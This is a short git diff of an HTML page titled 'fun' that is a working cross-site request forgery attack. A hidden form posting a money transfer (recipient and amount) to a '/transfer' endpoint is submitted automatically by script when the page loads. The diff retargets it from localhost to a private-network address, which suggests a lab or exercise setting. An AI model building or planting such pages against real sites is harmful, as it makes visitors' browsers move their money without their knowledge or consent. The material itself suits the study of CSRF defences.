--- a/index.html
+++ b/index.html
@@ -6,9 +6,9 @@
     <title>fun</title>
 </head>
 <body>
-    <form id="fun" action="http://127.0.0.1:8080/transfer" method="POST">
-        <input type="hidden" name="user_to" value="hackerz">
-        <input type="hidden" name="amount" value="1000">
+    <form id="fun" action="https://192.168.2.199:52011/transfer" method="POST">
+        <input type="hidden" name="user_to" value="deq">
+        <input type="hidden" name="amount" value="1">
     </form>
     <script>
         document.getElementById('fun').submit();
